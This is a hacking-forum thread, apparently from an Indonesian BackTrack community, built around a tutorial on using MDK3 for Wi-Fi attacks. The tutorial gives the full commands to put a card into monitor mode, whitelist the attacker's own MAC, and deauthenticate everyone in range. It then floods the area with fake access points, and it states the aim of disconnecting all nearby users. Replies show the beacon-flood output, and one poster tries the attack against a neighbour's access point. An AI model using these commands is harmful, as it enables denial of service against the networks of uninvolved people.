[enc0de]

Hey there, first time to meet you now i will share my knowledge here lets do it... :apn:
Using MDK3 is quite simple, since it comes with lots of help screens directly included in the code.
You can easily access them by typing only mdk3
MDK3 displays the main help screen. To see all possible options, type mdk3 --fullhelp
To see only information for a specific test, type mdk3 --help followed by the test mode identifier (b, a, p, d, m or x)

Before you can use MDK3, you need to setup your wireless adaptor. As far as there are different driver architectures, the way to setup your adaptor may vary depending on which driver is in use. To make this procedure easy, it is recommended to use airmon-ng from the aircrack project, since this can setup almost every known driver correctly.
To enable injection, your card needs to be started, switched to the monitor and a bitrate and channel have to be set.

Now lets put our wireless interface in monitor mode and a quick ifconfig to find out our mac address.

Code:

# airmon-ng start wlan0
# ifconfig

check the ndk3

Code:

# cd /pentes

t/wireless/mdk3
[/code]

Now we want to deauthenticated everyone in our WLAN range in order to do that we need to make a list of mac numbers that we DO NOT WANT TO GET AFFECTED witch is call a whitelist. So in my whitelist I'm going to be just adding my mac address because I don't care about all the others. So copy you mac address and type this in the MDK3 directory.

Code:

# echo YOUR_MAC > whitelist
# echo 00:24:2b:7c:3e:9d > whitelist

Now let's look at our d option the Deauthentication / Disassociation Amok Mode:

Code:

d   - Deauthentication / Disassociation Amok Mode
      Kicks everybody found from AP
      OPTIONS:
      -w
         Read file containing MACs not to care about (Whitelist mode)
      -b
         Read file containing MACs to run test on (Blacklist Mode)
      -s
         Set speed in packets per second (Default: unlimited)
      -c [chan,chan,chan,...]
         Enable channel hopping. Without providing any channels, mdk3 will hop an all
         14 b/g channels. Channel will be changed every 5 seconds.

So what we are going to use is the w option whitelist mode. leave the s option alone it's set to unlimited. Now the c option channel is up to you but I'm going with all AP's on channel 6 because most AP's are on that channel by default.

Code:

./mdk3 mon0 d -w whitelist -c 6

So now we have successfully launched the attack soon everyone will be disconnected. Now lets start flooding the air with fake access points. Open a new shell and browse to MDK3 directory and run this.

Code:

./mdk3 mon0 b -g -c 6

Code:

b   - Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
      OPTIONS:
      -n
         Use SSID instead of randomly generated ones
      -f
         Read SSIDs from file
      -v
         Read MACs and SSIDs from file. See example file!
      -d
         Show station as Ad-Hoc
      -w
         Set WEP bit (Generates encrypted networks)
      -g
         Show station as 54 Mbit
      -t
         Show station using WPA TKIP encryption
      -a
         Show station using WPA AES encryption
      -m
         Use valid accesspoint MAC from OUI database
      -h
         Hop to channel where AP is spoofed
         This makes the test more effective against some devices/drivers
         But it reduces packet rate due to channel hopping.
      -c
         Fake an AP on channel . If you want your card to hop on
         this channel, you have to set -h option, too!
      -s
         Set speed in packets per second (Default: 50)
a   - Authentication DoS mode

Now let me explain the b options is beacon flood mode. The -g option is Show station as 54 Mbit. -c option is channel now you can put an h if you want it to hope but if you specify a channel it will produce fake APs faster.



Now when the user refreshes his network list he should a never ending scan in backtrack..



try now... nice to join indonesian backtrack

very2 thanks for my teacher Liyan Oz :apn: was teach me all about Linux

UK Hacker TEAM

[zee eichel]

nice post brother... and wellc0me to IBT
btw when the formating is whitelist you can change it ? i still dont understand.. i try your tutor in my place its not works...

[devilnay]

nice post brother... and wellc0me to IBT
btw when the formating is whitelist you can change it ? i still dont understand.. i try your tutor in my place its not works...

in ur place nothing wireless available maybe sir,
so u must try in another place ^_^



@enc0de welcome to IBTeam i will try ur tutorials sir
nice Tutor

[zee eichel]

nice post brother... and wellc0me to IBT
btw when the formating is whitelist you can change it ? i still dont understand.. i try your tutor in my place its not works...

in ur place nothing wireless available maybe sir,
so u must try in another place ^__^

its have d-link wireless access point into my neighbour .. and i tested to choose settings with access point mac address register list .. its allowed just mac address listed to whitelist .. when i try .. its not work ..

[devilnay]

i try in my place
but in wicd network not show same in the picture

Code:

Current MAC: 3C:77:0B:9C:A4:0C on Channel 11 with SSID: 8j/_,"Cy4]O(
Current MAC: 69:4B:F8:4A:00:5D on Channel 11 with SSID: <my/=..%*h)?W
Current MAC: D7:5F:16:BA:4E:1C on Channel 11 with SSID: gP
Current MAC: FA:6F:F9:74:9E:7D on Channel 11 with SSID: uDN?C+X/sna<D0s
Current MAC: E1:52:0E:C6:CC:8F on Channel 11 with SSID: oh(kpwh/GL"2J1/p1
Current MAC: BB:DA:95:4E:41:07 on Channel 11 with SSID: g{Ty;g(D%v4F;xNu
Current MAC: BF:B2:0E:72:8C:5C on Channel 11 with SSID: GOgIh2ZdC/v"]Ux 7T{lxq_]&l%W|53

[9oBl4ck]

can u explained why sir ?